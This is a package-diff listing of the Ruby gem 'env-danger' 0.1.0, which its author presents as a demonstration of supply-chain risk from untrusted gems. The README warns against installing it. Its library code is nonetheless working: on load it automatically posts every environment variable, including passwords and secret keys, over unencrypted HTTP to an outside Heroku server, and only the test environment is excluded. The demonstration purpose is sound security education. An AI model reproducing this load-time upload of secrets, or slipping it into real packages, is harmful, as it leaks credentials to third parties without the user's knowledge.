RubyGems - env-danger - Versions diffs - 0.1.0 - Mend

env-danger 0.1.0

Files changed (17) hide show

checksums.yaml +7 -0
data/.document +5 -0
data/.rspec +2 -0
data/Gemfile +21 -0
data/Gemfile.lock +154 -0
data/LICENSE.txt +20 -0
data/README.md +29 -0
data/Rakefile +53 -0
data/VERSION +1 -0
data/env-danger.gemspec +91 -0
data/lib/env-danger.rb +8 -0
data/lib/env-danger/danger.rb +23 -0
data/lib/env-danger/version.rb +4 -0
data/spec/danger_spec.rb +21 -0
data/spec/fixtures/env_example.json +0 -0
data/spec/spec_helper.rb +104 -0
metadata +244 -0

checksums.yaml ADDED Viewed

@@ -0,0 +1,7 @@
+---
+SHA1:
+  metadata.gz: f459f79828c0916a13ced463dd0b9f45f5986b52
+  data.tar.gz: 4939a095c90dfe48dca09ed376ef20dcff8e0350
+SHA512:
+  metadata.gz: e6047eebc78999ceef30fd8a29e5c768268b4ba8731e1eb4fa2fb4e8ca06c2524a1d8cf239cad946408f5d35bc05fda48ccc25669d1f9a44356ec8de96e6b4bf
+  data.tar.gz: bbb1ae0adb36362087f2e9cfd3a08b54bf37764cfb742507d6fa05888cd6590694bf643eecc864a807e8208a3dc2d2e8b9cbf43f2c8fc7f25fc48d8b6079a003

data/.document ADDED Viewed

@@ -0,0 +1,5 @@
+lib/**/*.rb
+bin/*
+-
+features/**/*.feature
+LICENSE.txt

data/.rspec ADDED Viewed

	@@ -0,0 +1,2 @@
1	+ --color
2	+ --require spec_helper

data/Gemfile ADDED Viewed

@@ -0,0 +1,21 @@
+source 'http://rubygems.org'
+gem 'httparty', github: 'jnunemaker/httparty'
+group :development do
+  gem 'rdoc', '~> 3.12'
+  gem 'bundler', '~> 1.0'
+  gem 'jeweler', '~> 2.0.1'
+end
+group :development, :test do
+  gem 'rubocop'
+  gem 'rspec-core', '~> 3.2.0.pre', github: 'rspec/rspec-core'
+  gem 'rspec-expectations', '~> 3.2.0.pre', github: 'rspec/rspec-expectations'
+  gem 'rspec-support', '~> 3.2.0.pre', github: 'rspec/rspec-support'
+  gem 'rspec-mocks', '~> 3.2.0.pre', github: 'rspec/rspec-mocks'
+  gem 'rspec', '~> 3.2.0.pre', github: 'rspec/rspec'
+  gem 'simplecov', '>= 0'
+  gem 'coveralls'
+  gem 'webmock'
+end

data/Gemfile.lock ADDED Viewed

@@ -0,0 +1,154 @@
+GIT
+  remote: git://github.com/jnunemaker/httparty.git
+  revision: ed9b00b785c52dbea220b620faa6c8e6fbc29abe
+  specs:
+    httparty (0.13.3)
+      json (~> 1.8)
+      multi_xml (>= 0.5.2)
+GIT
+  remote: git://github.com/rspec/rspec-core.git
+  revision: 037291ea80486790da3916608ef4b101c1f71323
+  specs:
+    rspec-core (3.2.0.pre)
+      rspec-support (= 3.2.0.pre)
+GIT
+  remote: git://github.com/rspec/rspec-expectations.git
+  revision: 76962c4899b0413ce806a79e05a53e4b5d9da2c0
+  specs:
+    rspec-expectations (3.2.0.pre)
+      diff-lcs (>= 1.2.0, < 2.0)
+      rspec-support (= 3.2.0.pre)
+GIT
+  remote: git://github.com/rspec/rspec-mocks.git
+  revision: e9b6bf3532a4d5e01b492a5cad53fe56b751db3e
+  specs:
+    rspec-mocks (3.2.0.pre)
+      diff-lcs (>= 1.2.0, < 2.0)
+      rspec-support (= 3.2.0.pre)
+GIT
+  remote: git://github.com/rspec/rspec-support.git
+  revision: 187845b1d46269b17edcf24a67744f98a8d1e994
+  specs:
+    rspec-support (3.2.0.pre)
+GIT
+  remote: git://github.com/rspec/rspec.git
+  revision: 6af4995482ade2d49ad361ee003dee29f713ab17
+  specs:
+    rspec (3.2.0.pre)
+      rspec-core (= 3.2.0.pre)
+      rspec-expectations (= 3.2.0.pre)
+      rspec-mocks (= 3.2.0.pre)
+GEM
+  remote: http://rubygems.org/
+  specs:
+    addressable (2.3.6)
+    ast (2.0.0)
+    astrolabe (1.3.0)
+      parser (>= 2.2.0.pre.3, < 3.0)
+    builder (3.2.2)
+    coveralls (0.7.2)
+      multi_json (~> 1.3)
+      rest-client (= 1.6.7)
+      simplecov (>= 0.7)
+      term-ansicolor (= 1.2.2)
+      thor (= 0.18.1)
+    crack (0.4.2)
+      safe_yaml (~> 1.0.0)
+    descendants_tracker (0.0.4)
+      thread_safe (~> 0.3, >= 0.3.1)
+    diff-lcs (1.2.5)
+    docile (1.1.5)
+    faraday (0.9.0)
+      multipart-post (>= 1.2, < 3)
+    git (1.2.8)
+    github_api (0.12.2)
+      addressable (~> 2.3)
+      descendants_tracker (~> 0.0.4)
+      faraday (~> 0.8, < 0.10)
+      hashie (>= 3.3)
+      multi_json (>= 1.7.5, < 2.0)
+      nokogiri (~> 1.6.3)
+      oauth2
+    hashie (3.3.2)
+    highline (1.6.21)
+    jeweler (2.0.1)
+      builder
+      bundler (>= 1.0)
+      git (>= 1.2.5)
+      github_api
+      highline (>= 1.6.15)
+      nokogiri (>= 1.5.10)
+      rake
+      rdoc
+    json (1.8.1)
+    jwt (1.2.0)
+    mime-types (2.4.3)
+    mini_portile (0.6.2)
+    multi_json (1.10.1)
+    multi_xml (0.5.5)
+    multipart-post (2.0.0)
+    nokogiri (1.6.5)
+      mini_portile (~> 0.6.0)
+    oauth2 (1.0.0)
+      faraday (>= 0.8, < 0.10)
+      jwt (~> 1.0)
+      multi_json (~> 1.3)
+      multi_xml (~> 0.5)
+      rack (~> 1.2)
+    parser (2.2.0.pre.8)
+      ast (>= 1.1, < 3.0)
+      slop (~> 3.4, >= 3.4.5)
+    powerpack (0.0.9)
+    rack (1.6.0)
+    rainbow (2.0.0)
+    rake (10.4.2)
+    rdoc (3.12.2)
+      json (~> 1.4)
+    rest-client (1.6.7)
+      mime-types (>= 1.16)
+    rubocop (0.27.1)
+      astrolabe (~> 1.3)
+      parser (>= 2.2.0.pre.7, < 3.0)
+      powerpack (~> 0.0.6)
+      rainbow (>= 1.99.1, < 3.0)
+      ruby-progressbar (~> 1.4)
+    ruby-progressbar (1.7.0)
+    safe_yaml (1.0.4)
+    simplecov (0.9.1)
+      docile (~> 1.1.0)
+      multi_json (~> 1.0)
+      simplecov-html (~> 0.8.0)
+    simplecov-html (0.8.0)
+    slop (3.6.0)
+    term-ansicolor (1.2.2)
+      tins (~> 0.8)
+    thor (0.18.1)
+    thread_safe (0.3.4)
+    tins (0.13.2)
+    webmock (1.20.4)
+      addressable (>= 2.3.6)
+      crack (>= 0.3.2)
+PLATFORMS
+  ruby
+DEPENDENCIES
+  bundler (~> 1.0)
+  coveralls
+  httparty!
+  jeweler (~> 2.0.1)
+  rdoc (~> 3.12)
+  rspec (~> 3.2.0.pre)!
+  rspec-core (~> 3.2.0.pre)!
+  rspec-expectations (~> 3.2.0.pre)!
+  rspec-mocks (~> 3.2.0.pre)!
+  rspec-support (~> 3.2.0.pre)!
+  rubocop
+  simplecov
+  webmock

data/LICENSE.txt ADDED Viewed

@@ -0,0 +1,20 @@
+Copyright (c) 2015 David Fisher
+Permission is hereby granted, free of charge, to any person obtaining
+a copy of this software and associated documentation files (the
+"Software"), to deal in the Software without restriction, including
+without limitation the rights to use, copy, modify, merge, publish,
+distribute, sublicense, and/or sell copies of the Software, and to
+permit persons to whom the Software is furnished to do so, subject to
+the following conditions:
+The above copyright notice and this permission notice shall be
+included in all copies or substantial portions of the Software.
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
+EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
+MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
+NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
+LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
+OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
+WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.

data/README.md ADDED Viewed

@@ -0,0 +1,29 @@
+# ENV Danger
+As per this [blog post](http://movingfast.io/articles/environment-variables-considered-harmful/), and [discussion on Hacker News](https://news.ycombinator.com/item?id=8826024), keeping secret keys in your environment variables *may* be a poor idea. [The Twelve Factor App](http://12factor.net/) however specifically [recommends doing this](http://12factor.net/config).
+## What's this doing?
+This will take all your enviromental variables (passwords, secret keys, etc) and post them (insecurely over HTTP) to my server on Heroku.
+Server code can be found at: [https://github.com/tibbon/env_danger_server](https://github.com/tibbon/env_danger_server)
+## Usage
+**Do not install this gem and use it in production, or really... even in testing**
+But if you choose to ignore me:
+In your Gemfile
+```ruby
+  gem 'env-danger'
+```
+Or via Bundle:  `bundle install env-danger`
+You can run tests via `RAILS_ENV=test bundle exec rspec spec`. Yes, this is a little weird, but intentionally so.
+**Including this in your app will post your ENV variables to my (likely not very secure) server on Heroku. This is a terrible idea**

data/Rakefile ADDED Viewed

@@ -0,0 +1,53 @@
+# encoding: utf-8
+require 'rubygems'
+require 'bundler'
+begin
+  Bundler.setup(:default, :development)
+rescue Bundler::BundlerError => e
+  $stderr.puts e.message
+  $stderr.puts 'Run `bundle install` to install missing gems'
+  exit e.status_code
+end
+require 'rake'
+require 'jeweler'
+Jeweler::Tasks.new do |gem|
+  # gem is a Gem::Specification...
+  # see http://guides.rubygems.org/specification-reference/ for more options
+  gem.name = 'env-danger'
+  gem.homepage = 'http://github.com/tibbon/env-danger'
+  gem.license = 'MIT'
+  gem.summary = %(Do not install, a security-hole demo only)
+  gem.description = %(Demonstrates the dangers of using
+                        ENV to store credentials)
+  gem.email = 'tibbon@gmail.com'
+  gem.authors = ['David Fisher']
+  # dependencies defined in Gemfile
+end
+Jeweler::RubygemsDotOrgTasks.new
+require 'rake/testtask'
+Rake::TestTask.new(:test) do |test|
+  test.libs << 'lib' << 'test'
+  test.pattern = 'test/**/test_*.rb'
+  test.verbose = true
+end
+desc 'Code coverage detail'
+task :simplecov do
+  ENV['COVERAGE'] = 'true'
+  Rake::Task['test'].execute
+end
+task default: :test
+require 'rdoc/task'
+Rake::RDocTask.new do |rdoc|
+  version = File.exist?('VERSION') ? File.read('VERSION') : ''
+  rdoc.rdoc_dir = 'rdoc'
+  rdoc.title = "env-danger #{version}"
+  rdoc.rdoc_files.include('README*')
+  rdoc.rdoc_files.include('lib/**/*.rb')
+end

data/VERSION ADDED Viewed

	@@ -0,0 +1 @@
1	+ 0.1.0

data/env-danger.gemspec ADDED Viewed

@@ -0,0 +1,91 @@
+# Generated by jeweler
+# DO NOT EDIT THIS FILE DIRECTLY
+# Instead, edit Jeweler::Tasks in Rakefile, and run 'rake gemspec'
+# -*- encoding: utf-8 -*-
+# stub: env-danger 0.1.0 ruby lib
+Gem::Specification.new do |s|
+  s.name = "env-danger"
+  s.version = "0.1.0"
+  s.required_rubygems_version = Gem::Requirement.new(">= 0") if s.respond_to? :required_rubygems_version=
+  s.require_paths = ["lib"]
+  s.authors = ["David Fisher"]
+  s.date = "2015-01-02"
+  s.description = "Demonstrates the dangers of using\n                        ENV to store credentials"
+  s.email = "tibbon@gmail.com"
+  s.extra_rdoc_files = [
+    "LICENSE.txt",
+    "README.md"
+  ]
+  s.files = [
+    ".document",
+    ".rspec",
+    "Gemfile",
+    "Gemfile.lock",
+    "LICENSE.txt",
+    "README.md",
+    "Rakefile",
+    "VERSION",
+    "env-danger.gemspec",
+    "lib/env-danger.rb",
+    "lib/env-danger/danger.rb",
+    "lib/env-danger/version.rb",
+    "spec/danger_spec.rb",
+    "spec/fixtures/env_example.json",
+    "spec/spec_helper.rb"
+  ]
+  s.homepage = "http://github.com/tibbon/env-danger"
+  s.licenses = ["MIT"]
+  s.rubygems_version = "2.2.2"
+  s.summary = "Do not install, a security-hole demo only"
+  if s.respond_to? :specification_version then
+    s.specification_version = 4
+    if Gem::Version.new(Gem::VERSION) >= Gem::Version.new('1.2.0') then
+      s.add_runtime_dependency(%q<httparty>, [">= 0"])
+      s.add_development_dependency(%q<rdoc>, ["~> 3.12"])
+      s.add_development_dependency(%q<bundler>, ["~> 1.0"])
+      s.add_development_dependency(%q<jeweler>, ["~> 2.0.1"])
+      s.add_development_dependency(%q<rubocop>, [">= 0"])
+      s.add_development_dependency(%q<rspec-core>, ["~> 3.2.0.pre"])
+      s.add_development_dependency(%q<rspec-expectations>, ["~> 3.2.0.pre"])
+      s.add_development_dependency(%q<rspec-support>, ["~> 3.2.0.pre"])
+      s.add_development_dependency(%q<rspec-mocks>, ["~> 3.2.0.pre"])
+      s.add_development_dependency(%q<rspec>, ["~> 3.2.0.pre"])
+      s.add_development_dependency(%q<simplecov>, [">= 0"])
+      s.add_development_dependency(%q<coveralls>, [">= 0"])
+      s.add_development_dependency(%q<webmock>, [">= 0"])
+    else
+      s.add_dependency(%q<httparty>, [">= 0"])
+      s.add_dependency(%q<rdoc>, ["~> 3.12"])
+      s.add_dependency(%q<bundler>, ["~> 1.0"])
+      s.add_dependency(%q<jeweler>, ["~> 2.0.1"])
+      s.add_dependency(%q<rubocop>, [">= 0"])
+      s.add_dependency(%q<rspec-core>, ["~> 3.2.0.pre"])
+      s.add_dependency(%q<rspec-expectations>, ["~> 3.2.0.pre"])
+      s.add_dependency(%q<rspec-support>, ["~> 3.2.0.pre"])
+      s.add_dependency(%q<rspec-mocks>, ["~> 3.2.0.pre"])
+      s.add_dependency(%q<rspec>, ["~> 3.2.0.pre"])
+      s.add_dependency(%q<simplecov>, [">= 0"])
+      s.add_dependency(%q<coveralls>, [">= 0"])
+      s.add_dependency(%q<webmock>, [">= 0"])
+    end
+  else
+    s.add_dependency(%q<httparty>, [">= 0"])
+    s.add_dependency(%q<rdoc>, ["~> 3.12"])
+    s.add_dependency(%q<bundler>, ["~> 1.0"])
+    s.add_dependency(%q<jeweler>, ["~> 2.0.1"])
+    s.add_dependency(%q<rubocop>, [">= 0"])
+    s.add_dependency(%q<rspec-core>, ["~> 3.2.0.pre"])
+    s.add_dependency(%q<rspec-expectations>, ["~> 3.2.0.pre"])
+    s.add_dependency(%q<rspec-support>, ["~> 3.2.0.pre"])
+    s.add_dependency(%q<rspec-mocks>, ["~> 3.2.0.pre"])
+    s.add_dependency(%q<rspec>, ["~> 3.2.0.pre"])
+    s.add_dependency(%q<simplecov>, [">= 0"])
+    s.add_dependency(%q<coveralls>, [">= 0"])
+    s.add_dependency(%q<webmock>, [">= 0"])
+  end
+end

data/lib/env-danger.rb ADDED Viewed

@@ -0,0 +1,8 @@
+require 'httparty'
+require_relative './env-danger/version'
+require_relative './env-danger/danger'
+# Doesn't run in this line in test environment
+# stops test from picking it up and triggering it
+# Also makes my testing easier, so the real request isn't made
+EnvDanger.upload unless ENV['RAILS_ENV'] == 'test'

data/lib/env-danger/danger.rb ADDED Viewed

@@ -0,0 +1,23 @@
+# EnvDanger
+# This module takes your system's ENV variables and posts them to my server
+# Do NOT use in production
+# This is an example of what could happen if you allow untrusted code
+# to execute on your system.
+# Surely, no reasonable individual would allow such,
+# but how often do you audit your gems?
+module EnvDanger
+  include HTTParty
+  POST_ADDRESS = 'http://env-danger.herokuapp.com/envs'
+  class << self
+    def upload
+      post(
+        POST_ADDRESS,
+        body: {
+          all_envs: {
+            variables: ENV
+          }
+        }
+      )
+    end
+  end
+end

data/lib/env-danger/version.rb ADDED Viewed

@@ -0,0 +1,4 @@
+# Sets the version of EnvDanger gem
+module EnvDanger
+  VERSION = '0.0.1'
+end

data/spec/danger_spec.rb ADDED Viewed

@@ -0,0 +1,21 @@
+require 'spec_helper'
+require 'env-danger'
+RSpec.describe EnvDanger do
+  describe '.upload' do
+    before :each do
+      # Temporarily clear ENV hash,
+      # so that not much is posting to the server
+      ENV.clear
+      ENV.update({'foo' => 'bar'})
+      stub_request(:post, EnvDanger::POST_ADDRESS).
+        to_return(body: fixture('env_example.json'))
+    end
+    it 'posts ENV data via HTTParty' do
+      env_result = EnvDanger.upload
+      expect(a_request(:post, EnvDanger::POST_ADDRESS)).to have_been_made
+      expect(env_result.code).to eq 200
+    end
+  end
+end

data/spec/fixtures/env_example.json ADDED Viewed

File without changes

data/spec/spec_helper.rb ADDED Viewed

@@ -0,0 +1,104 @@
+require 'simplecov'
+require 'coveralls'
+require 'webmock/rspec'
+# This file was generated by the `rspec --init` command. Conventionally, all
+# specs live under a `spec` directory, which RSpec adds to the `$LOAD_PATH`.
+# The generated `.rspec` file contains `--require spec_helper` which will cause
+# this file to always be loaded, without a need to explicitly require it in any
+# files.
+#
+# Given that it is always loaded, you are encouraged to keep this file as
+# light-weight as possible. Requiring heavyweight dependencies from this file
+# will add to the boot time of your test suite on EVERY test run, even for an
+# individual file that may not need all of that loaded. Instead, consider making
+# a separate helper file that requires the additional dependencies and performs
+# the additional setup, and require it from the spec files that actually need
+# it.
+#
+# The `.rspec` file also contains a few flags that are not defaults but that
+# users commonly want.
+#
+# See http://rubydoc.info/gems/rspec-core/RSpec/Core/Configuration
+RSpec.configure do |config|
+  # rspec-expectations config goes here. You can use an alternate
+  # assertion/expectation library such as wrong or the stdlib/minitest
+  # assertions if you prefer.
+  config.expect_with :rspec do |expectations|
+    # This option will default to `true` in RSpec 4. It makes the `description`
+    # and `failure_message` of custom matchers include text for helper methods
+    # defined using `chain`, e.g.:
+    #     be_bigger_than(2).and_smaller_than(4).description
+    #     # => "be bigger than 2 and smaller than 4"
+    # ...rather than:
+    #     # => "be bigger than 2"
+    expectations.include_chain_clauses_in_custom_matcher_descriptions = true
+  end
+  # rspec-mocks config goes here. You can use an alternate test double
+  # library (such as bogus or mocha) by changing the `mock_with` option here.
+  config.mock_with :rspec do |mocks|
+    # Prevents you from mocking or stubbing a method that does not exist on
+    # a real object. This is generally recommended, and will default to
+    # `true` in RSpec 4.
+    mocks.verify_partial_doubles = true
+  end
+  # The settings below are suggested to provide a good initial experience
+  # with RSpec, but feel free to customize to your heart's content.
+  # These two settings work together to allow you to limit a spec run
+  # to individual examples or groups you care about by tagging them with
+  # `:focus` metadata. When nothing is tagged with `:focus`, all examples
+  # get run.
+  config.filter_run :focus
+  config.run_all_when_everything_filtered = true
+  # Limits the available syntax to the non-monkey patched syntax that is
+  # recommended. For more details, see:
+  #   - http://myronmars.to/n/dev-blog/2012/06/rspecs-new-expectation-syntax
+  #   - http://teaisaweso.me/blog/2013/05/27/rspecs-new-message-expectation-syntax/
+  #   - http://myronmars.to/n/dev-blog/2014/05/notable-changes-in-rspec-3#new__config_option_to_disable_rspeccore_monkey_patching
+  config.disable_monkey_patching!
+  # This setting enables warnings. It's recommended, but in some cases may
+  # be too noisy due to issues in dependencies.
+  config.warnings = true
+  # Many RSpec users commonly either run the entire suite or an individual
+  # file, and it's useful to allow more verbose output when running an
+  # individual spec file.
+  if config.files_to_run.one?
+    # Use the documentation formatter for detailed output,
+    # unless a formatter has already been configured
+    # (e.g. via a command-line flag).
+    config.default_formatter = 'doc'
+  end
+  # Print the 10 slowest examples and example groups at the
+  # end of the spec run, to help surface which specs are running
+  # particularly slow.
+  config.profile_examples = 10
+  # Run specs in random order to surface order dependencies. If you find an
+  # order dependency and want to debug it, you can fix the order by providing
+  # the seed, which is printed after each run.
+  #     --seed 1234
+  config.order = :random
+  # Seed global randomization in this process using the `--seed` CLI option.
+  # Setting this allows you to use `--seed` to deterministically reproduce
+  # test failures related to randomization by passing the same `--seed` value
+  # as the one that triggered the failure.
+  Kernel.srand config.seed
+end
+# Helper methods for accessing fixture path
+def fixture_path
+  File.expand_path('../fixtures', __FILE__)
+end
+# Helper method for accessing a real file in the fixture path
+def fixture(file)
+  File.new(fixture_path + '/' + file)
+end

metadata ADDED Viewed

@@ -0,0 +1,244 @@
+--- !ruby/object:Gem::Specification
+name: env-danger
+version: !ruby/object:Gem::Version
+  version: 0.1.0
+platform: ruby
+authors:
+- David Fisher
+autorequire:
+bindir: bin
+cert_chain: []
+date: 2015-01-02 00:00:00.000000000 Z
+dependencies:
+- !ruby/object:Gem::Dependency
+  name: httparty
+  requirement: !ruby/object:Gem::Requirement
+    requirements:
+    - - ">="
+      - !ruby/object:Gem::Version
+        version: '0'
+  type: :runtime
+  prerelease: false
+  version_requirements: !ruby/object:Gem::Requirement
+    requirements:
+    - - ">="
+      - !ruby/object:Gem::Version
+        version: '0'
+- !ruby/object:Gem::Dependency
+  name: rdoc
+  requirement: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: '3.12'
+  type: :development
+  prerelease: false
+  version_requirements: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: '3.12'
+- !ruby/object:Gem::Dependency
+  name: bundler
+  requirement: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: '1.0'
+  type: :development
+  prerelease: false
+  version_requirements: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: '1.0'
+- !ruby/object:Gem::Dependency
+  name: jeweler
+  requirement: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: 2.0.1
+  type: :development
+  prerelease: false
+  version_requirements: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: 2.0.1
+- !ruby/object:Gem::Dependency
+  name: rubocop
+  requirement: !ruby/object:Gem::Requirement
+    requirements:
+    - - ">="
+      - !ruby/object:Gem::Version
+        version: '0'
+  type: :development
+  prerelease: false
+  version_requirements: !ruby/object:Gem::Requirement
+    requirements:
+    - - ">="
+      - !ruby/object:Gem::Version
+        version: '0'
+- !ruby/object:Gem::Dependency
+  name: rspec-core
+  requirement: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: 3.2.0.pre
+  type: :development
+  prerelease: false
+  version_requirements: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: 3.2.0.pre
+- !ruby/object:Gem::Dependency
+  name: rspec-expectations
+  requirement: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: 3.2.0.pre
+  type: :development
+  prerelease: false
+  version_requirements: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: 3.2.0.pre
+- !ruby/object:Gem::Dependency
+  name: rspec-support
+  requirement: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: 3.2.0.pre
+  type: :development
+  prerelease: false
+  version_requirements: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: 3.2.0.pre
+- !ruby/object:Gem::Dependency
+  name: rspec-mocks
+  requirement: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: 3.2.0.pre
+  type: :development
+  prerelease: false
+  version_requirements: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: 3.2.0.pre
+- !ruby/object:Gem::Dependency
+  name: rspec
+  requirement: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: 3.2.0.pre
+  type: :development
+  prerelease: false
+  version_requirements: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: 3.2.0.pre
+- !ruby/object:Gem::Dependency
+  name: simplecov
+  requirement: !ruby/object:Gem::Requirement
+    requirements:
+    - - ">="
+      - !ruby/object:Gem::Version
+        version: '0'
+  type: :development
+  prerelease: false
+  version_requirements: !ruby/object:Gem::Requirement
+    requirements:
+    - - ">="
+      - !ruby/object:Gem::Version
+        version: '0'
+- !ruby/object:Gem::Dependency
+  name: coveralls
+  requirement: !ruby/object:Gem::Requirement
+    requirements:
+    - - ">="
+      - !ruby/object:Gem::Version
+        version: '0'
+  type: :development
+  prerelease: false
+  version_requirements: !ruby/object:Gem::Requirement
+    requirements:
+    - - ">="
+      - !ruby/object:Gem::Version
+        version: '0'
+- !ruby/object:Gem::Dependency
+  name: webmock
+  requirement: !ruby/object:Gem::Requirement
+    requirements:
+    - - ">="
+      - !ruby/object:Gem::Version
+        version: '0'
+  type: :development
+  prerelease: false
+  version_requirements: !ruby/object:Gem::Requirement
+    requirements:
+    - - ">="
+      - !ruby/object:Gem::Version
+        version: '0'
+description: |-
+  Demonstrates the dangers of using
+                          ENV to store credentials
+email: tibbon@gmail.com
+executables: []
+extensions: []
+extra_rdoc_files:
+- LICENSE.txt
+- README.md
+files:
+- ".document"
+- ".rspec"
+- Gemfile
+- Gemfile.lock
+- LICENSE.txt
+- README.md
+- Rakefile
+- VERSION
+- env-danger.gemspec
+- lib/env-danger.rb
+- lib/env-danger/danger.rb
+- lib/env-danger/version.rb
+- spec/danger_spec.rb
+- spec/fixtures/env_example.json
+- spec/spec_helper.rb
+homepage: http://github.com/tibbon/env-danger
+licenses:
+- MIT
+metadata: {}
+post_install_message:
+rdoc_options: []
+require_paths:
+- lib
+required_ruby_version: !ruby/object:Gem::Requirement
+  requirements:
+  - - ">="
+    - !ruby/object:Gem::Version
+      version: '0'
+required_rubygems_version: !ruby/object:Gem::Requirement
+  requirements:
+  - - ">="
+    - !ruby/object:Gem::Version
+      version: '0'
+requirements: []
+rubyforge_project:
+rubygems_version: 2.2.2
+signing_key:
+specification_version: 4
+summary: Do not install, a security-hole demo only
+test_files: []